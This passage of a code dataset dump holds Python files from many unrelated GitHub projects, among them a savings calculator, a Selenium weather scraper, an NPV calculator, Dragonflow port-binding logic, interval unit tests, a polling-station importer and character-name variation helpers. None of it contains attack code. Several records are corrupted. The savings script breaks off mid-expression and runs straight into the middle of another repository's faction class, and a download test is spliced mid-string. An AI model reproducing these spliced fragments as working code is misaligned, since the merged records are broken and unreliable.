zip_safe=False,\n)\n","repo_name":"bchcustoms/cuspy","sub_path":"meursing/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35909989466","text":"annual_salary=float(input(\"Enter your annual salary:\"))\r\nportion_saved=float(input(\"Enter the percent of your salary to save, as a decimal: \"))\r\ntotal_cost=float(input(\"Enter the cost of your dream home:\"))\r\nm=1\r\nportion_deposit=0.20\r\ncurrent_savings=0\r\nm_salary=annual_salary/12\r\nr=0.04\r\nsemi_annual_raise=0.10\r\nmoney_needed=total_cost*portion_deposit\r\nwhile(current_savings= size):\n return avg/count\n else:\n None\n\n for i in self.agent_list:\n if (i.getId() != requesting_agent.getId()):\n if(i.getBias(other_agent_group) != None):\n avg += i.getBias(other_agent_group)\n count += 1\n avg = avg / count\n\n if(count >= size):\n return avg\n else:\n None\n\n # @jit(nopython=True)\n def getNetPayoff(self):\n net = 0\n for i in self.agent_list:\n net += i.getPayoff()\n return net","repo_name":"deep-inder/prejudice_model","sub_path":"nGroups/faction.py","file_name":"faction.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35690028022","text":"from selenium import webdriver\n\ndriver=webdriver.Chrome()\n\ndriver.get('http://www.weather.com.cn/html/province/jiangsu.shtml')\n\nele=driver.find_element_by_id('forecastID')\n\ncity_temps=ele.text.split('℃\\n')\n\nlowest=None\nlowest_city=[]\nfor temp in city_temps:\n temp=temp.replace('℃','')\n # print(temp)\n #城市名\n city_name= temp.split('\\n')[0]\n #温度\n weather=temp.split('\\n')[1]\n #低温\n lowtemp=min([int(one) for one in weather.split('/')])\n\n if lowest==None or lowtemp\" + b\n )\n with download() as paths:\n for path in paths():\n assert path.read_text().startswith(\"\")\n assert path.read_text().endswith(\"
\\n\")\n download.http.assert_called_once()\n","repo_name":"cuducos/calculadora-do-cidadao","sub_path":"tests/test_download.py","file_name":"test_download.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"48"} +{"seq_id":"75120188944","text":"import numpy as np\nimport pandas as pd\n\nimport json\nimport sys\n\nimport common\n\nclass NPVDataSet:\n\n def __init__(self, npv_file):\n\n with open(npv_file, 'r') as f:\n npv_data = json.load(f)\n\n self.total_year = npv_data['Years']\n self.uptime = npv_data['Uptime']\n self.capex = self.Capex(npv_data['CAPEX'], self.total_year)\n self.opex = self.Opex(npv_data['OPEX'])\n self.drillex = self.Drillex(npv_data['DRILLEX'], self.total_year)\n self.discount_rate = npv_data['Discount_rate']\n self.oil_price = npv_data['Oil_price']\n self.fopt = self.FOPT(npv_data['FOPT'])\n\n def get_capex(self):\n\n return self.Capex(self.capex)\n\n class Capex:\n def __init__(self, capex, total_year):\n self.start_year = capex['Start_year']\n self.fraction = capex['Fraction']\n\n # Check fraction\n temp = 0\n for frac in self.fraction:\n temp += frac\n if temp > 1:\n raise ValueError('Capex fraction aggregation is more than 1!')\n\n # Check start_year\n if self.start_year > total_year :\n raise ValueError('Capex start year is beyond the total year')\n elif self.start_year <= 0 :\n raise ValueError('Capex start year has to be positive')\n else:\n pass\n\n # Check length\n if self.start_year + len(self.fraction) - 1 <= total_year:\n pass\n else:\n raise ValueError('Capex fraction is too long or total year is too short')\n\n\n self.amount = capex['Amount']\n\n class Opex:\n def __init__(self, opex):\n self.start_year = opex['Start_year']\n self.amount = opex['Amount']\n\n class Drillex:\n def __init__(self, drillex, total_year):\n self.start_year = drillex['Start_year']\n self.excalation = drillex['Excalation']\n self.amount = drillex['Amount']\n self.wells = drillex['Wells']\n\n # Check start_year\n if self.start_year > total_year :\n raise ValueError('Drillex start year is beyond the total year')\n elif self.start_year <= 0 :\n raise ValueError('Drillex start year has to be positive')\n else:\n pass\n\n # Check length\n if self.start_year + len(self.wells) - 1 <= total_year:\n pass\n else:\n raise ValueError('Drillex well planning is too long or total year is too short')\n\n\n class FOPT:\n def __init__(self, fopt):\n self.start_year = fopt['Start_year']\n self.data = fopt['Data']\n\ndef get_production_total(total_year, start_year):\n\n # Set production data to match the starting year\n fopt_data = np.load(npv.fopt.data)\n\n # Input fopt data to the data frame\n fopt_list = []\n for ii in range(1, total_year + 1):\n if ii < start_year:\n fopt_list.append(0.0)\n else:\n fopt_list.append(fopt_data[ii-start_year])\n\n return fopt_list\n\ndef get_revenue(fopt, oil_price):\n\n return fopt*npv.oil_price\n\ndef get_drillex(total_year, start_year, amount, excalation, wells):\n\n drillex_data = np.zeros(total_year)\n\n for i in range(start_year, start_year + len(wells)):\n drillex_data[i-1] = wells[i-start_year]*amount*((1+excalation)**i)\n\n return drillex_data\n\ndef get_capex(total_year, start_year, amount, fraction):\n\n capex_data = np.zeros(total_year)\n\n for i in range(start_year, start_year + len(fraction)):\n capex_data[i-1] = fraction[i-start_year]*amount\n\n return capex_data\n\ndef get_opex(total_year, start_year, amount):\n\n opex_data = np.zeros(total_year)\n\n for i in range(start_year, total_year + 1):\n opex_data[i-1] = amount\n\n return opex_data\n\ndef get_discounted_cash_flow(total_year, cash_flow, discounted_rate):\n\n dcf_data = np.zeros(total_year)\n cash_flow = np.array(cash_flow)\n for i in range(1, total_year+1):\n dcf_data[i-1] = cash_flow[i-1]/((1 + discounted_rate)**i)\n\n return dcf_data\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) != 3:\n print('To run: python npv_calculation.py /path/to/npv_dataset.json/ /path/to/result.csv/')\n sys.exit(1)\n\n file_path = sys.argv[1]\n result_path = sys.argv[2]\n\n npv = NPVDataSet(file_path)\n\n uptime_days = npv.uptime * 365\n\n # Initialize dataframe\n df = pd.DataFrame(index=range(1,npv.total_year+1))\n\n df['FOPT (stb)'] = get_production_total(npv.total_year, npv.fopt.start_year)\n df['Revenue (USD)'] = get_revenue(df['FOPT (stb)'], npv.oil_price)\n df['Drillex (USD)'] = get_drillex(npv.total_year, npv.drillex.start_year, npv.drillex.amount, npv.drillex.excalation, npv.drillex.wells)\n df['Capex (USD)'] = get_capex(npv.total_year, npv.capex.start_year, npv.capex.amount, npv.capex.fraction)\n df['Opex (USD)'] = get_opex(npv.total_year, npv.opex.start_year, npv.opex.amount)\n df['Total_Cost (USD)'] = df['Drillex (USD)'] + df['Capex (USD)'] + df['Opex (USD)']\n df['Cash_Flow (USD)'] = df['Revenue (USD)'] - df['Total_Cost (USD)']\n df['DCF (USD)'] = get_discounted_cash_flow(npv.total_year, df['Cash_Flow (USD)'], npv.discount_rate)\n\n total_wells = np.sum(npv.drillex.wells)\n net_present_value = df['DCF (USD)'].sum()\n\n\n print(df)\n # Writing results to the path\n\n common.write_to_csv('NPV Calculation', result_path)\n common.append_to_csv('Dataset source, %s \\n' %file_path, result_path )\n common.append_to_csv('Total number of years, %s, Years \\n' %npv.total_year, result_path )\n common.append_to_csv('Uptime, %s \\n' %npv.uptime, result_path )\n common.append_to_csv('Discount rate, %s \\n' %npv.discount_rate, result_path )\n common.append_to_csv('Oil price, %s, USD/stb \\n' %npv.oil_price, result_path )\n common.append_to_csv('Total number of wells, %s \\n \\n' %total_wells, result_path )\n\n df.to_csv(result_path, mode='a')\n # data = [34700000., 33700000., 26700000., 20100000., 15300000., 11600000., 8720000.,\n # 6620000., 5010000., 3730000., 2760000., 2100000., 1590000., 1150000.]\n\n common.append_to_csv('\\n', result_path )\n common.append_to_csv('Net Present Value (NPV), %s, USD \\n' %net_present_value, result_path )\n # np.save(\"./json_files/npv_calculation/FOPT.npy\", data)","repo_name":"iffanh/petlab","sub_path":"random/npv_calculation.py","file_name":"npv_calculation.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18789113164","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\nfrom oslo_log import log\n\nfrom dragonflow.controller import df_base_app\nfrom dragonflow.controller import port_locator\nfrom dragonflow.db.models import constants as model_constants\nfrom dragonflow.db.models import l2\n\n\nLOG = log.getLogger(__name__)\n\n\ndef _port_update_unbind(lport, orig_lport):\n # wasn't bounded any way\n if orig_lport.enabled is False:\n return\n\n # port moved between chassis or admin disabled\n if (orig_lport.is_local != lport.is_local\n or orig_lport.is_remote != lport.is_remote\n or lport.enabled is False):\n if orig_lport.is_local:\n orig_lport.emit_unbind_local()\n elif orig_lport.is_remote:\n orig_lport.emit_unbind_remote()\n\n\ndef _port_update_bind(lport, orig_lport):\n # not needed to be bound\n if lport.enabled is False:\n return\n\n # port moved between chassis or admin enabled\n if (orig_lport.is_local != lport.is_local\n or orig_lport.is_remote != lport.is_remote\n or orig_lport.enabled is False):\n if lport.is_local:\n lport.emit_bind_local()\n elif lport.is_remote:\n lport.emit_bind_remote()\n\n\nclass PortBindingApp(df_base_app.DFlowApp):\n def __init__(self, *args, **kwargs):\n super(PortBindingApp, self).__init__(*args, **kwargs)\n self.switch_features_handler()\n\n def switch_features_handler(self, ev=None):\n self._local_ports = set()\n self._remote_ports = set()\n port_locator.reset()\n\n @df_base_app.register_event(l2.LogicalPort, model_constants.EVENT_CREATED)\n def _port_created(self, lport):\n\n if lport.enabled is False:\n return\n\n if lport.is_local:\n lport.emit_bind_local()\n elif lport.is_remote:\n lport.emit_bind_remote()\n\n @df_base_app.register_event(l2.LogicalPort, model_constants.EVENT_UPDATED)\n def _port_updated(self, lport, orig_lport):\n\n _port_update_unbind(lport, orig_lport)\n\n if lport.id in self._local_ports:\n lport.emit_local_updated(orig_lport)\n elif lport.id in self._remote_ports:\n lport.emit_remote_updated(orig_lport)\n\n _port_update_bind(lport, orig_lport)\n\n @df_base_app.register_event(l2.LogicalPort, model_constants.EVENT_DELETED)\n def _port_deleted(self, lport):\n\n if lport.enabled is False:\n return\n\n if lport.id in self._local_ports:\n lport.emit_unbind_local()\n elif lport.id in self._remote_ports:\n lport.emit_unbind_remote()\n\n @df_base_app.register_event(l2.LogicalPort, l2.EVENT_BIND_LOCAL)\n def _port_bound_local(self, lport):\n self._local_ports.add(lport.id)\n\n @df_base_app.register_event(l2.LogicalPort, l2.EVENT_UNBIND_LOCAL)\n def _port_unbound_local(self, lport):\n self._local_ports.remove(lport.id)\n\n @df_base_app.register_event(l2.LogicalPort, l2.EVENT_BIND_REMOTE)\n def _port_bound_remote(self, lport):\n self._remote_ports.add(lport.id)\n\n @df_base_app.register_event(l2.LogicalPort, l2.EVENT_UNBIND_REMOTE)\n def _port_unbound_remote(self, lport):\n self._remote_ports.remove(lport.id)\n","repo_name":"openstack-archive/dragonflow","sub_path":"dragonflow/controller/apps/portbinding.py","file_name":"portbinding.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"48"} +{"seq_id":"38908787868","text":"def lillyPadRecursive(lillyPadList, souceIndex, targetIndex): \n if (targetIndex == souceIndex): \n return 0\n if (lillyPadList[souceIndex] == 0): \n return float('inf') \n minJumps = float('inf') \n for i in range(souceIndex + 1, targetIndex + 1): \n if (i < souceIndex + lillyPadList[souceIndex] + 1): \n tempJumps = lillyPadRecursive(lillyPadList, i, targetIndex) \n if (tempJumps != float('inf') and \n tempJumps + 1 < minJumps): \n minJumps = tempJumps + 1\n return minJumps\n\ndef main():\n\tnumLillyPads = int(input())\n\tlillyPadList = input().split(\" \")\n\tfor i in range(len(lillyPadList)):\n\t\tlillyPadList[i] = int(lillyPadList[i])\n\tminJumpsVal = lillyPadRecursive(lillyPadList, 0, len(lillyPadList))\n\tif (minJumpsVal != float('inf')):\n\t\tprint(minJumpsVal)\n\telse:\n\t\tprint(\"-1\")\n\nmain()","repo_name":"Dane1247/CollegeWork","sub_path":"Design & Analysis of Algorithms/Homework 6/Problem 3/Problem3.py","file_name":"Problem3.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71785988945","text":"# test case\n\nimport unittest\nfrom unittest import TestCase\nimport interval\nfrom interval import mergeIntervals\nfrom interval import mergeOverlapping\nfrom interval import insert\n\n\"\"\"test funcstion in interval.py\"\"\"\n\nclass interval_unittest(unittest.TestCase):\n\n def setUp(self):\n pass\n\n # merge interval test\n\n def test_mergeIntervals_1(self):\n a = interval.interval('[1,5]')\n b = interval.interval('[2,7]')\n c = interval.mergeIntervals(a,b)\n self.assertEqual(str(c), '[1,7]')\n\n def test_mergeIntervals_2(self):\n a = interval.interval('[1,2]')\n b = interval.interval('[3,4]')\n c = interval.mergeIntervals(a,b)\n self.assertEqual(str(c), '[1,4]')\n\n def test_mergeIntervals_3(self):\n a = interval.interval('[3,12)')\n b = interval.interval('[12,13)')\n c = interval.mergeIntervals(a,b)\n self.assertEqual(str(c), '[3,13)')\n\n def test_mergeIntervals_4(self):\n a = interval.interval('[1,2)')\n b = interval.interval('(2,4]')\n with self.assertRaises(ValueError) as cm:\n interval.mergeIntervals(a,b)\n the_exception = cm.exception\n self.assertEquals(str(the_exception), 'Disjoint intervals!')\n\n # mergeOverlapping test\n\n def test_mergeOverlapping_1(self):\n a = ['[1,2]', '[3,4]', '[5,6]']\n lst = []\n for item in a:\n lst.append(interval.interval(item))\n b = interval.mergeOverlapping(lst)\n self.assertEqual(str(b), '[[1,6]]')\n\n def test_mergeOverlapping_2(self):\n a = ['[1,2)', '(2,4]', '(4,6]']\n lst = []\n for item in a:\n lst.append(interval.interval(item))\n b = interval.mergeOverlapping(lst)\n self.assertEqual(str(b), '[[1,2), (2,6]]')\n\n def test_mergeOverlapping_3(self):\n a = ['[1,5)', '(2,4]', '[5,6]']\n lst = []\n for item in a:\n lst.append(interval.interval(item))\n b = interval.mergeOverlapping(lst)\n self.assertEqual(str(b), '[[1,6]]')\n\n def test_mergeOverlapping_4(self):\n a = ['[1,5)', '(5,7]', '(7,10]']\n lst = []\n for item in a:\n lst.append(interval.interval(item))\n b = interval.mergeOverlapping(lst)\n self.assertEqual(str(b), '[[1,5), (5,10]]')\n\n # insert test \n\n def test_insert_1(self):\n a = ['[1,3]', '[6,9]']\n lst = []\n for item in a:\n lst.append(interval.interval(item)) \n b = interval.interval('[2,5]')\n c = interval.insert(lst, b)\n self.assertEqual(str(c), '[[1,9]]')\n\n\n def test_insert_2(self):\n a = ['[1,2]', '(3,5)', '[6,7)', '(8,10]', '[12,16]']\n lst = []\n for item in a:\n lst.append(interval.interval(item)) \n b = interval.interval('[4,9]')\n c = interval.insert(lst, b)\n self.assertEqual(str(c), '[[1,2], (3,10], [12,16]]')\n\n def test_insert_3(self):\n a = ['[1,3]', '[6,9]']\n lst = []\n for item in a:\n lst.append(interval.interval(item)) \n b = interval.interval('[4,5]')\n c = interval.insert(lst, b)\n self.assertEqual(str(c), '[[1,9]]')\n\n def test_insert_3(self):\n a = ['[1,3]', '[6,9]']\n lst = []\n for item in a:\n lst.append(interval.interval(item)) \n b = interval.interval('(4,5]')\n c = interval.insert(lst, b)\n self.assertEqual(str(c), '[[1,3], (4,9]]')\n\n def test_insert_4(self):\n a = ['[1,2)', '(2,9]']\n lst = []\n for item in a:\n lst.append(interval.interval(item)) \n b = interval.interval('(3,10]')\n c = interval.insert(lst, b)\n self.assertEqual(str(c), '[[1,2), (2,10]]')\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"clickpn/assignment6","sub_path":"sy1743/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7190804188","text":"# 4408. 자기 방으로 돌아가기\n\nT = int(input())\nfor test in range(T):\n N = int(input())\n arr = []\n rooms = [0] * 201 # 방 개수 200개(홀짝을 고려하기 힘드므로 합쳐줄 것)\n for i in range(N):\n x, y = map(int, input().split())\n x = (x+1)//2 # (1,2) (3,4) ~~~ (399,400)을 짝을 짓기 위해\n y = (y+1)//2\n arr.append((x, y))\n\n for x, y in arr:\n if x > y: # x가 큰 경우\n x, y = y, x # 스왑\n for i in range(x, y+1): # x~y까지 방에 모두 +1\n rooms[i] += 1\n\n print('#{} {}'.format(test+1, max(rooms))) # rooms의 최대값이 걸린 시간 단위임","repo_name":"Yookaser/Algorithm","sub_path":"SWEA/D4/swea4408.py","file_name":"swea4408.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6509384216","text":"from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter\n\n\nclass Command(BaseXpressDemocracyClubCsvImporter):\n council_id = \"MEL\"\n addresses_name = (\n \"2023-05-04/2023-05-03T13:04:51.058305/Democracy_Club__04May2023.tsv\"\n )\n stations_name = (\n \"2023-05-04/2023-05-03T13:04:51.058305/Democracy_Club__04May2023.tsv\"\n )\n elections = [\"2023-05-04\"]\n csv_delimiter = \"\\t\"\n\n def address_record_to_dict(self, record):\n uprn = record.property_urn.strip().lstrip(\"0\")\n if uprn in [\n \"10002082195\", # 1 POTTER HILL, NOTTINGHAM ROAD, MELTON MOWBRAY\n ]:\n return None\n if record.addressline6 in [\n # split\n \"NG32 1QG\",\n \"LE14 2XB\",\n \"NG32 1QQ\",\n # not sure\n \"LE14 4SS\",\n \"LE14 4SR\",\n ]:\n return None\n\n return super().address_record_to_dict(record)\n","repo_name":"DemocracyClub/UK-Polling-Stations","sub_path":"polling_stations/apps/data_importers/management/commands/import_melton.py","file_name":"import_melton.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"71134725905","text":"student_list = []\r\n\r\ndef create_student():\r\n #Ask user for the student name and marks\r\n student_name = input(\"Enter your name: \")\r\n # create a dict in the format {'name':student_name, 'marks': []}\r\n student = {'name':student_name,\r\n 'marks': []}\r\n # return the dictionary\r\n return student\r\n\r\ndef add_marks(student, mark):\r\n #add a mark to the student dictionary\r\n student[\"marks\"].append(mark)\r\n\r\ndef calc_avg_mark(student):\r\n #check len of students marks\r\n number = len(student['marks'])\r\n if number == 0:\r\n return 0\r\n #calculate the average\r\n total = sum(student['marks'])\r\n return total/number\r\n\r\ndef student_details(student):\r\n #print out the string that tells the user the info abouth the student\r\n print(f\"The name of the student is {student['name']}, scores are {student['marks']}\"\r\n f\" and the average mark is {calc_avg_mark(student)}\")\r\n\r\ndef print_all_students(students):\r\n # print out the string that tells the user the info abouth the student for every student in the list\r\n for i, student in enumerate(students):\r\n print(f\"ID : {i}\")\r\n print(student_details(student))\r\n\r\n\r\ndef menu():\r\n #add a student to a student list\r\n #add a mark to a student\r\n #Print a list of students\r\n #Exit the application\r\n selection = input(\"Enter 'p' to print the list of all students,\"\r\n \" 's' to add a new student,\"\r\n \" 'm' to add marks for the student,\"\r\n \" 'q' to exit\"\r\n \"\\nEnter your selection: ...\")\r\n while selection != 'q':\r\n if selection == 'p':\r\n print_all_students(student_list)\r\n print(\"No students in the list\")\r\n elif selection == 's':\r\n student_list.append(create_student())\r\n elif selection == 'm':\r\n student_id = int(input(\"Enter the student ID to a mark to: \"))\r\n student = student_list[student_id]\r\n new_mark = int(input(\"Enter a new mark to be added: \"))\r\n add_marks(student, new_mark)\r\n\r\n selection = input(\"Enter 'p' to print the list of all students,\"\r\n \" 's' to add a new student,\"\r\n \" 'm' to add marks for the student,\"\r\n \" 'q' to exit\"\r\n \"\\nEnter your selection: ...\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nmenu()","repo_name":"Likh-Alex/PostgreSQL-Python","sub_path":"registration_app.py","file_name":"registration_app.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24469669634","text":"from django.urls import path\n\nfrom apps.post.views import (\n HomeView,\n PostCreateView,\n PostDeleteView,\n PostEditView,\n SinglePostView,\n)\n\napp_name = 'post'\nurlpatterns = [\n path('', HomeView.as_view(), name='home'),\n path('post/create/', PostCreateView.as_view(), name='create_post'),\n path('post//delete/', PostDeleteView.as_view(), name='delete_post'),\n path('post//edit/', PostEditView.as_view(), name='edit_post'),\n path('post//', SinglePostView.as_view(), name='single_post'),\n]\n","repo_name":"GorbatovNikolay/DjangoProject","sub_path":"src/urls/post_urls.py","file_name":"post_urls.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21334603605","text":"from calendar import c\nfrom misc import open_dict\nimport numpy as np\nimport re\n\ntitles = ['mr', 'mrs', 'mr.', 'mrs.', 'miss', 'sir', 'aunt', 'uncle', 'lady', 'ms.', 'doctor.', 'doctor', 'dr.', 'general', 'rev.', 'reverend']\nmaleTitles = ['mr', 'mr.', 'sir', 'uncle', 'doctor.', 'doctor', 'dr.', 'general', 'rev.', 'reverend']\n\n# from self import remove_title, get_first_name, remove_mr, remove_first_name, get_last_three_words, remove_middle_name\n\ndef score_output(charChains, y_pred, outputChains): \n \n # y_pred = process_predictions(y_pred, outputChains)\n\n predictions = np.zeros((y_pred.shape[0], len(charChains)))\n\n TP = 0\n FP = 0\n FN = 0\n\n for i, (prediction, outputChain) in enumerate(zip(y_pred, outputChains)):\n if prediction == 1:\n\n found = False\n\n canonicalCharName = str(outputChain[0])\n\n if len(canonicalCharName) > 3:\n if canonicalCharName[-3:] == \" 's\":\n canonicalCharName = canonicalCharName[:-3]\n\n for j, groundTruthChar in enumerate(charChains):\n for charVariation in groundTruthChar:\n if charVariation.lower().strip() == canonicalCharName.lower().strip():\n predictions[i,j] += 1\n found = True\n break\n\n if found:\n break\n\n votes = np.sum(predictions, axis = 0)\n finds = np.sum(predictions, axis = 1)\n\n for k, vote in enumerate(votes):\n if vote == 0:\n FN += 1\n elif vote > 0:\n TP += 1\n FP += (vote - 1)\n\n for k, find in enumerate(finds):\n if y_pred[k] == 1:\n if find == 0:\n FP += 1\n\n ## check for errors\n if FP + TP != sum(y_pred):\n print('error 1')\n\n if FN + TP != len(charChains):\n print('error 2')\n\n ##\n if np.sum(y_pred) == 0:\n accuracy = 0\n else:\n accuracy = TP / np.sum(y_pred)\n\n if TP == 0:\n recall = 0\n precision = 0\n f1 = 0\n else:\n recall = TP / (TP + FN)\n precision = TP / (TP + FP)\n f1 = 2 * ((precision * recall) / (precision + recall))\n\n\n return accuracy, recall, precision, f1, finds, votes\n \n\ndef process_predictions(y_pred, outputChains):\n for i, (prediction, outputChain) in enumerate(zip(y_pred, outputChains)):\n if prediction == 1:\n if outputChain[0] == None or outputChain[0].strip() == \"'s\":\n y_pred[i] = 0.\n\n return y_pred\n\n\ndef combine_corefs(corefsDir, fileNames):\n '''\n Returns list of all the coref chains for a set of stories.\n '''\n fileName = fileNames[0]\n corefs = open_dict(corefsDir + fileName + '.p')\n refsAll = get_ref_exps_from_coref_dict(corefs)\n\n for i in range(1, len(fileNames)):\n fileName = fileNames[i]\n corefs = open_dict(corefsDir + fileName + '.p')\n refs = get_ref_exps_from_coref_dict(corefs)\n\n for ref in refs:\n refsAll.append(ref)\n\n return refsAll\n\ndef get_ref_exps_from_coref_dict(corefs):\n '''\n Takes coref dict. \n Returns lists of referring expressions, corresponsing to each CR chain. \n The first item in each list corresponds to the coref chain 'title'\n '''\n refExps = []\n\n for chain in corefs['clusters']:\n refs = []\n refs.append(chain['name'])\n\n for mention in chain['mentions']:\n refs.append(mention['text'])\n\n refExps.append(refs)\n \n return refExps\n\n\ndef get_all_variations_catchall(characterList):\n\n variationsList = []\n\n for character in characterList:\n\n l = [character]\n\n characters = separate_character(character)\n\n l = [character]\n\n for char in characters:\n l += get_variations(char)\n\n variationsList.append(l)\n\n return variationsList\n\n\ndef get_all_variations(characterList):\n\n variationsList = []\n\n for character in characterList:\n\n characters = separate_character(character)\n\n for char in characters:\n variationsList.append(get_variations(char))\n\n return variationsList\n\ndef get_variations(character):\n\n character = character.strip()\n\n variations = [character]\n\n # remove brackets / quoted from character. Add what#s within brackets / quotes to variations\n if remove_brackets(character) != character:\n variations.append(get_text_from_within_brackets(character).replace('\"','').replace('“','').replace('”',''))\n variations = iterate_through_var_functions(get_text_from_within_brackets(character), variations)\n character = remove_brackets(character).strip()\n if character == '':\n return variations\n variations.append(character)\n\n if remove_quoted(character) != character:\n variations.append(get_text_within_quoted(character))\n variations = iterate_through_var_functions(get_text_within_quoted(character), variations)\n character = remove_quoted(character).strip()\n if character == '':\n return variations\n variations.append(character)\n\n\n variations = iterate_through_var_functions(character, variations)\n\n for varNum, var in enumerate(variations):\n variations[varNum] = remove_lonely_brackets(var).strip()\n\n for i in range(len(variations) -1, -1, -1):\n if variations[i].replace('\\n','') != variations[i]:\n variations.append(variations[i].replace('\\n',''))\n \n return variations\n\n\ndef separate_character(character):\n '''\n takes in character ( \"Mr and Mrs Dark\", \"Pip\", \"Billy, Andy and John\")\n returns list of all the characters there. might be length 1\n '''\n\n if not ', ' in character:\n return (separate_ands(character))\n\n return separated_by_comma(character)\n \n\ndef remove_letters(character, letters):\n return character.replace(letters, '')\n \n\ndef remove_title(character):\n '''\n assumes form 'Mr John Clarke'\n returns 'John Clarke'\n returns character with honorific removed\n '''\n\n splits = character.split(' ')\n\n containsAnd = False\n for split in splits:\n if split.lower() == 'and':\n containsAnd = True\n break\n\n if containsAnd:\n return character\n\n\n if splits[0].lower() in titles and len(splits) > 2:\n return ' '.join(splits[1:])\n\n else:\n return character\n \ndef remove_title_keep_first_name(character):\n '''\n assumes form 'Mr John Clarke'\n returns 'John Clarke'\n returns character with honorific removed\n '''\n\n splits = character.split(' ')\n\n containsAnd = False\n for split in splits:\n if split.lower() == 'and':\n containsAnd = True\n break\n\n if containsAnd:\n return character\n\n\n if splits[0].lower() in titles and len(splits) > 2:\n return ' '.join([splits[0], splits[1]])\n\n else:\n return character\n \n\ndef get_text_from_within_brackets(character):\n '''\n assume no ands in character.\n returns text from within brackets. If not brackets are present, returns original character text.\n '''\n res = re.findall(r'\\(.*?\\)', character)\n\n if len(res) == 0:\n return character\n\n return res[0].replace('(','').replace(')','')\n\n\ndef get_first_name(character):\n '''\n assumes character is made up of first name + last\n Removes surname\n '''\n\n if character.split(' ')[0].lower() in titles or len(character.split(' ')) != 2:\n return character\n\n if character.split(' ')[0].lower() == 'the':\n return character\n\n return character.split(' ')[0].strip()\n\n\n\n\ndef separate_ands(character):\n '''\n Assumes input of form 'Mr and Mrs Darcy' or 'James and Joan Clarke'\n Returns [Mr Darcy, Mrs Darcy], [James Clarke, Joan Clark]\n If not in assumed form, returns character\n '''\n splitsComma = character.split(', ')\n if len(splitsComma) > 1:\n return([character])\n\n\n splitsAnd = character.split(' and ')\n if len(splitsAnd) != 2:\n return([character])\n\n # Mr and Mrs James Brown -> Mr James Brown, Mrs James Brown\n\n if len(splitsAnd[0].split(' ')) == 1 and len(splitsAnd[1].split(' ')) == 1:\n return [splitsAnd[0], splitsAnd[0]]\n\n if len(splitsAnd[0].split(' ')) == 1 and len(splitsAnd[1].split(' ')) > 1:\n return [ ' '.join([splitsAnd[0], ' '.join(splitsAnd[1].split(' ')[1:])]) , splitsAnd[1] ]\n\n else:\n return [splitsAnd[0], splitsAnd[0]]\n\ndef remove_mr(character):\n '''\n assumes form 'Mr John Clarke or Mr Clarke'\n returns 'Clarke'\n returns character with honorific removed\n '''\n\n splits = character.split(' ')\n\n containsAnd = False\n for split in splits:\n if split.lower() == 'and':\n containsAnd = True\n break\n\n if containsAnd:\n return character\n\n\n if splits[0].lower() in maleTitles and \"'\" not in splits[1]:\n return splits[-1]\n\n else:\n return character\n\ndef separated_by_comma(character):\n '''\n assumes form: 'X, Y and Z' or 'X, Y, and Z'\n \n \n '''\n splits = character.split(',')\n chars = []\n\n\n if len(splits) == 1:\n return [character]\n\n if len(splits) == 2:\n containsAnd = False\n for split in splits:\n if ' and ' in split:\n containsAnd = True\n\n if not containsAnd:\n return [character]\n\n if ' and ' in character:\n splitsNew = []\n for s in splits:\n ss = s.split(' and ')\n for a in ss:\n if a != '':\n splitsNew.append(a.strip())\n\n splits = splitsNew\n\n addSurname = True\n for i, s in enumerate(splits):\n \n if i < len(splits) - 1:\n if len(s.split(' ')) != 1:\n addSurname = False\n break\n \n if i == len(splits) - 1:\n if len(s.split(' ')) != 2:\n addSurname = False\n break\n\n for i, s in enumerate(splits):\n if i < len(splits) - 1:\n if not addSurname:\n chars.append(s)\n else:\n chars.append(' '.join([s, splits[len(splits) - 1].split(' ')[-1]]))\n else:\n chars.append(s)\n\n return chars\n\n\ndef remove_first_name(character):\n '''\n Mrs. John Sedley -> Mrs. Sedley\n Mr. John Sedley -> Mr. Sedley\n '''\n splits = character.split(' ')\n\n containsAnd = False\n for split in splits:\n if split.lower() == 'and':\n containsAnd = True\n break\n\n if containsAnd:\n return character\n\n if splits[0].lower() in titles and len(splits) == 3:\n return ' '.join([splits[0], splits[-1]])\n\n else:\n return character\n\ndef remove_brackets(character):\n\n return re.sub(\"[\\(\\[].*?[\\)\\]]\", \"\", character).strip().replace(' ',' ')\n\n\ndef remove_quoted(character):\n\n if '“' in character: \n return re.sub(r'“.*”',\"\",character).strip().replace(' ',' ')\n \n if '\"' in character: \n return 